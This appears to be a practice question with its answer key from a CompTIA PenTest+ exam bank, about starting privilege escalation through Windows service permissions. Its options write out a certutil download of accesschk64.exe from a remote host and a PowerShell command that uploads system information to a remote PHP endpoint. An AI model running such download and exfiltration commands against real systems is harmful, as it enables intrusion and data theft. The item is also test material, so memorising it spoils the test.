CompTIA PenTest+ (PT0-002) — Question 236

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester start this process?

Answer options

• A. certutil –urlcache –split –f http://192.168.2.124/windows-binaries/accesschk64.exe
• B. powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’, ‘systeminfo.txt’)
• C. schtasks /query /fo LIST /v | find /I “Next Run Time:”
• D. wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

Correct answer: A

Explanation

The correct answer is A because it uses the certutil command to download a tool that can check service permissions, which is essential for the tester's objective. Options B and D involve file uploads or different download methods that do not specifically target service permissions. Option C retrieves scheduled task information but does not aid in the exploitation of service permissions.